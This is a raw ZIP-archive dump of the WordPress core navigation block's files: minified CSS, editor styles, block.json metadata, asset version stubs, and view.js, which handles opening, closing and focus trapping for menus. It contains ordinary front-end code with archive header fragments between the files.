.wp-block-navigation__submenu-icon{margin-left:0;margin-right:auto}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:transparent;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-left:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(90deg)}}.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{right:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:transparent;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;line-height:inherit;text-align:right;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-left:.85em}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-right:-.6em;pointer-events:none}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:0;right:auto}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;right:auto}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid rgba(0,0,0,.15)}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-right:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards;background-color:inherit;display:flex;flex-direction:column;overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-left),20em) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem);z-index:100000}@media (prefers-reduced-motion:reduce){.wp-block-navigation__responsive-container.is-menu-open{animation-delay:0s;animation-duration:1ms}}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:transparent!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{right:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:transparent;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{left:0;position:absolute;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}PK7[8l l navigation/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/navigation", "title": "Navigation", "category": "theme", "description": "A collection of blocks that allow visitors to get around your site.", "keywords": [ "menu", "navigation", "links" ], "textdomain": "default", "attributes": { "ref": { "type": "number" }, "textColor": { "type": "string" }, "customTextColor": { "type": "string" }, "rgbTextColor": { "type": "string" }, "backgroundColor": { "type": "string" }, "customBackgroundColor": { "type": "string" }, "rgbBackgroundColor": { "type": "string" }, "showSubmenuIcon": { "type": "boolean", "default": true }, "openSubmenusOnClick": { "type": "boolean", "default": false }, "overlayMenu": { "type": "string", "default": "mobile" }, "icon": { "type": "string", "default": "handle" }, "hasIcon": { "type": "boolean", "default": true }, "__unstableLocation": { "type": "string" }, "overlayBackgroundColor": { "type": "string" }, "customOverlayBackgroundColor": { "type": "string" }, "overlayTextColor": { "type": "string" }, "customOverlayTextColor": { "type": "string" }, "maxNestingLevel": { "type": "number", "default": 5 }, "templateLock": { "type": [ "string", "boolean" ], "enum": [ "all", "insert", "contentOnly", false ] } }, "providesContext": { "textColor": "textColor", "customTextColor": "customTextColor", "backgroundColor": "backgroundColor", "customBackgroundColor": "customBackgroundColor", "overlayTextColor": "overlayTextColor", "customOverlayTextColor": "customOverlayTextColor", "overlayBackgroundColor": "overlayBackgroundColor", "customOverlayBackgroundColor": "customOverlayBackgroundColor", "fontSize": "fontSize", "customFontSize": "customFontSize", "showSubmenuIcon": "showSubmenuIcon", "openSubmenusOnClick": "openSubmenusOnClick", "style": "style", "maxNestingLevel": "maxNestingLevel" }, "supports": { "align": [ "wide", "full" ], "ariaLabel": true, "html": false, "inserter": true, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalTextTransform": true, "__experimentalFontFamily": true, "__experimentalLetterSpacing": true, "__experimentalTextDecoration": true, "__experimentalSkipSerialization": [ "textDecoration" ], "__experimentalDefaultControls": { "fontSize": true } }, "spacing": { "blockGap": true, "units": [ "px", "em", "rem", "vh", "vw" ], "__experimentalDefaultControls": { "blockGap": true } }, "layout": { "allowSwitching": false, "allowInheriting": false, "allowVerticalAlignment": false, "allowSizingOnChildren": true, "default": { "type": "flex" } }, "__experimentalStyle": { "elements": { "link": { "color": { "text": "inherit" } } } }, "interactivity": true }, "viewScript": "file:./view.min.js", "editorStyle": "wp-block-navigation-editor", "style": "wp-block-navigation" } PK7[2r22navigation/editor.cssnu[.editor-styles-wrapper .wp-block-navigation ul{ margin-bottom:0; margin-left:0; margin-top:0; padding-left:0; } .editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{ margin:revert; } .wp-block-navigation-item__label{ display:inline; } .wp-block-navigation-item,.wp-block-navigation__container{ background-color:inherit; } .wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{ opacity:0; visibility:hidden; } .has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{ display:flex; opacity:1; visibility:visible; } .is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{ opacity:1; visibility:visible; } .is-editing>.wp-block-navigation__container{ display:flex; flex-direction:column; opacity:1; visibility:visible; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{ opacity:1; visibility:hidden; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{ visibility:visible; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender{ display:block; position:static; width:100%; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{ background:#1e1e1e; border-radius:2px; color:#fff; margin-left:auto; margin-right:0; padding:0; width:24px; } .wp-block-navigation__submenu-container .block-list-appender{ display:none; } .block-library-colors-selector{ width:auto; } .block-library-colors-selector .block-library-colors-selector__toggle{ display:block; margin:0 auto; padding:3px; width:auto; } .block-library-colors-selector .block-library-colors-selector__icon-container{ align-items:center; border-radius:4px; display:flex; height:30px; margin:0 auto; padding:3px; position:relative; } .block-library-colors-selector .block-library-colors-selector__state-selection{ border-radius:11px; box-shadow:inset 0 0 0 1px rgba(0,0,0,.2); height:22px; line-height:20px; margin-left:auto; margin-right:auto; min-height:22px; min-width:22px; padding:2px; width:22px; } .block-library-colors-selector .block-library-colors-selector__state-selection>svg{ min-width:auto !important; } .block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{ color:inherit; } .block-library-colors-selector__popover .color-palette-controller-container{ padding:16px; } .block-library-colors-selector__popover .components-base-control__label{ height:20px; line-height:20px; } .block-library-colors-selector__popover .component-color-indicator{ float:right; margin-top:2px; } .block-library-colors-selector__popover .components-panel__body-title{ display:none; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{ background-color:#1e1e1e; color:#fff; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{ padding:0; } .wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{ background-color:transparent; color:#1e1e1e; } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:.5; } to{ opacity:1; } } .components-placeholder.wp-block-navigation-placeholder{ background:none; box-shadow:none; color:inherit; min-height:0; outline:none; padding:0; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{ font-size:inherit; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{ margin-bottom:0; } .wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{ color:#1e1e1e; } .wp-block-navigation-placeholder__preview{ align-items:center; background:transparent; color:currentColor; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; min-width:96px; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{ display:none; } .wp-block-navigation-placeholder__preview:before{ border:1px dashed; border-radius:2px; border-radius:inherit; bottom:0; content:""; display:block; left:0; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview:before:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview>svg{ fill:currentColor; } .wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{ min-height:90px; } .wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{ min-height:132px; } .wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{ align-items:flex-start; flex-direction:row; padding:6px 8px; } .wp-block-navigation-placeholder__controls{ background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; display:none; float:left; position:relative; width:100%; z-index:1; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{ display:flex; } .is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{ display:none; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{ align-items:flex-start; flex-direction:column; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{ display:none; } .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{ height:36px; margin-right:12px; } .wp-block-navigation-placeholder__actions__indicator{ align-items:center; display:flex; height:36px; justify-content:flex-start; line-height:0; margin-left:4px; padding:0 6px 0 0; } .wp-block-navigation-placeholder__actions__indicator svg{ fill:currentColor; margin-right:4px; } .wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{ flex-direction:row !important; } .wp-block-navigation-placeholder__actions{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; gap:6px; height:100%; } .wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{ margin-right:0; } .wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{ background-color:#1e1e1e; border:0; height:100%; margin:auto 0; max-height:16px; min-height:1px; min-width:1px; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{ display:none; } } .wp-block-navigation__responsive-container.is-menu-open{ position:fixed; top:155px; } @media (min-width:782px){ .wp-block-navigation__responsive-container.is-menu-open{ left:36px; top:93px; } } @media (min-width:960px){ .wp-block-navigation__responsive-container.is-menu-open{ left:160px; } } @media (min-width:782px){ .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{ top:141px; } } .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:141px; } .is-sidebar-opened .wp-block-navigation__responsive-container.is-menu-open{ right:280px; } .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ left:0; top:155px; } @media (min-width:782px){ .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ top:61px; } .is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{ top:109px; } } .is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:109px; } body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{ bottom:0; left:0; right:0; top:0; } .components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ color:inherit; height:auto; padding:0; } .components-heading.wp-block-navigation-off-canvas-editor__title{ margin:0; } .wp-block-navigation-off-canvas-editor__header{ margin-bottom:8px; } .is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{ margin-top:16px; } @keyframes fadein{ 0%{ opacity:0; } to{ opacity:1; } } .wp-block-navigation__loading-indicator-container{ padding:8px 12px; } .wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{ margin-top:0; } @keyframes fadeouthalf{ 0%{ opacity:1; } to{ opacity:.5; } } .wp-block-navigation-delete-menu-button{ justify-content:center; margin-bottom:16px; width:100%; } .components-button.is-link.wp-block-navigation-manage-menus-button{ margin-bottom:16px; } .wp-block-navigation__overlay-menu-preview{ align-items:center; background-color:#f0f0f0; display:flex; height:64px; justify-content:space-between; margin-bottom:12px; padding:0 24px; width:100%; } .wp-block-navigation__overlay-menu-preview.open{ background-color:#fff; box-shadow:inset 0 0 0 1px #e0e0e0; outline:1px solid transparent; } .wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{ display:none; } .wp-block-navigation__navigation-selector{ margin-bottom:16px; width:100%; } .wp-block-navigation__navigation-selector-button{ border:1px solid; justify-content:space-between; width:100%; } .wp-block-navigation__navigation-selector-button__icon{ flex:0 0 auto; } .wp-block-navigation__navigation-selector-button__label{ flex:0 1 auto; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .wp-block-navigation__navigation-selector-button--createnew{ border:1px solid; margin-bottom:16px; width:100%; } .wp-block-navigation__responsive-container-open.components-button{ opacity:1; } .wp-block-navigation__menu-inspector-controls{ overflow-x:auto; scrollbar-color:transparent transparent; scrollbar-gutter:stable both-edges; scrollbar-width:thin; will-change:transform; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{ background-color:transparent; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:transparent; border:3px solid transparent; border-radius:8px; } .wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{ scrollbar-color:#949494 transparent; } @media (hover:none){ .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#949494 transparent; } } .wp-block-navigation__menu-inspector-controls__empty-message{ margin-left:24px; }PK7[EJJTT#navigation/view-modal.min.asset.phpnu[ array(), 'version' => 'b478fa3cd1475dec97d3'); PK7[e!TTnavigation/view.min.asset.phpnu[ array(), 'version' => 'e3d6f3216904b5b42831'); PK7[l<<navigation/view.jsnu["use strict"; (self["__WordPressPrivateInteractivityAPI__"] = self["__WordPressPrivateInteractivityAPI__"] || []).push([[3],{ /***/ 932: /***/ (function(__unused_webpack_module, __unused_webpack___webpack_exports__, __webpack_require__) { /* harmony import */ var _wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(754); /** * WordPress dependencies */ const focusableSelectors = ['a[href]', 'input:not([disabled]):not([type="hidden"]):not([aria-hidden])', 'select:not([disabled]):not([aria-hidden])', 'textarea:not([disabled]):not([aria-hidden])', 'button:not([disabled]):not([aria-hidden])', '[contenteditable]', '[tabindex]:not([tabindex^="-"])']; // This is a fix for Safari in iOS/iPadOS. Without it, Safari doesn't focus out // when the user taps in the body. It can be removed once we add an overlay to // capture the clicks, instead of relying on the focusout event. document.addEventListener('click', () => {}); const openMenu = (store, menuOpenedOn) => { const { context, selectors } = store; selectors.core.navigation.menuOpenedBy(store)[menuOpenedOn] = true; if (context.core.navigation.type === 'overlay') { // Add a `has-modal-open` class to the root. document.documentElement.classList.add('has-modal-open'); } }; const closeMenu = (store, menuClosedOn) => { const { context, selectors } = store; selectors.core.navigation.menuOpenedBy(store)[menuClosedOn] = false; // Check if the menu is still open or not. if (!selectors.core.navigation.isMenuOpen(store)) { if (context.core.navigation.modal?.contains(window.document.activeElement)) { context.core.navigation.previousFocus?.focus(); } context.core.navigation.modal = null; context.core.navigation.previousFocus = null; if (context.core.navigation.type === 'overlay') { document.documentElement.classList.remove('has-modal-open'); } } }; (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .store */ .h)({ effects: { core: { navigation: { initMenu: store => { const { context, selectors, ref } = store; if (selectors.core.navigation.isMenuOpen(store)) { const focusableElements = ref.querySelectorAll(focusableSelectors); context.core.navigation.modal = ref; context.core.navigation.firstFocusableElement = focusableElements[0]; context.core.navigation.lastFocusableElement = focusableElements[focusableElements.length - 1]; } }, focusFirstElement: store => { const { selectors, ref } = store; if (selectors.core.navigation.isMenuOpen(store)) { ref.querySelector('.wp-block-navigation-item > *:first-child').focus(); } } } } }, selectors: { core: { navigation: { roleAttribute: store => { const { context, selectors } = store; return context.core.navigation.type === 'overlay' && selectors.core.navigation.isMenuOpen(store) ? 'dialog' : null; }, ariaModal: store => { const { context, selectors } = store; return context.core.navigation.type === 'overlay' && selectors.core.navigation.isMenuOpen(store) ? 'true' : null; }, ariaLabel: store => { const { context, selectors } = store; return context.core.navigation.type === 'overlay' && selectors.core.navigation.isMenuOpen(store) ? context.core.navigation.ariaLabel : null; }, isMenuOpen: ({ context }) => // The menu is opened if either `click`, `hover` or `focus` is true. Object.values(context.core.navigation[context.core.navigation.type === 'overlay' ? 'overlayOpenedBy' : 'submenuOpenedBy']).filter(Boolean).length > 0, menuOpenedBy: ({ context }) => context.core.navigation[context.core.navigation.type === 'overlay' ? 'overlayOpenedBy' : 'submenuOpenedBy'] } } }, actions: { core: { navigation: { openMenuOnHover(store) { const { navigation } = store.context.core; if (navigation.type === 'submenu' && // Only open on hover if the overlay is closed. Object.values(navigation.overlayOpenedBy || {}).filter(Boolean).length === 0) openMenu(store, 'hover'); }, closeMenuOnHover(store) { closeMenu(store, 'hover'); }, openMenuOnClick(store) { const { context, ref } = store; context.core.navigation.previousFocus = ref; openMenu(store, 'click'); }, closeMenuOnClick(store) { closeMenu(store, 'click'); closeMenu(store, 'focus'); }, openMenuOnFocus(store) { openMenu(store, 'focus'); }, toggleMenuOnClick: store => { const { selectors, context, ref } = store; // Safari won't send focus to the clicked element, so we need to manually place it: https://bugs.webkit.org/show_bug.cgi?id=22261 if (window.document.activeElement !== ref) ref.focus(); const menuOpenedBy = selectors.core.navigation.menuOpenedBy(store); if (menuOpenedBy.click || menuOpenedBy.focus) { closeMenu(store, 'click'); closeMenu(store, 'focus'); } else { context.core.navigation.previousFocus = ref; openMenu(store, 'click'); } }, handleMenuKeydown: store => { const { context, selectors, event } = store; if (selectors.core.navigation.menuOpenedBy(store).click) { // If Escape close the menu. if (event?.key === 'Escape') { closeMenu(store, 'click'); closeMenu(store, 'focus'); return; } // Trap focus if it is an overlay (main menu). if (context.core.navigation.type === 'overlay' && event.key === 'Tab') { // If shift + tab it change the direction. if (event.shiftKey && window.document.activeElement === context.core.navigation.firstFocusableElement) { event.preventDefault(); context.core.navigation.lastFocusableElement.focus(); } else if (!event.shiftKey && window.document.activeElement === context.core.navigation.lastFocusableElement) { event.preventDefault(); context.core.navigation.firstFocusableElement.focus(); } } } }, handleMenuFocusout: store => { const { context, event } = store; // If focus is outside modal, and in the document, close menu // event.target === The element losing focus // event.relatedTarget === The element receiving focus (if any) // When focusout is outsite the document, // `window.document.activeElement` doesn't change. // The event.relatedTarget is null when something outside the navigation menu is clicked. This is only necessary for Safari. if (event.relatedTarget === null || !context.core.navigation.modal?.contains(event.relatedTarget) && event.target !== window.document.activeElement) { closeMenu(store, 'click'); closeMenu(store, 'focus'); } } } } } }); /***/ }) }, /******/ function(__webpack_require__) { // webpackRuntimeModules /******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); } /******/ var __webpack_exports__ = (__webpack_exec__(932)); /******/ } ]);PK7[H@@navigation/style.min.cssnu[.wp-block-navigation{--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center;position:relative}.wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;background-color:inherit;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline 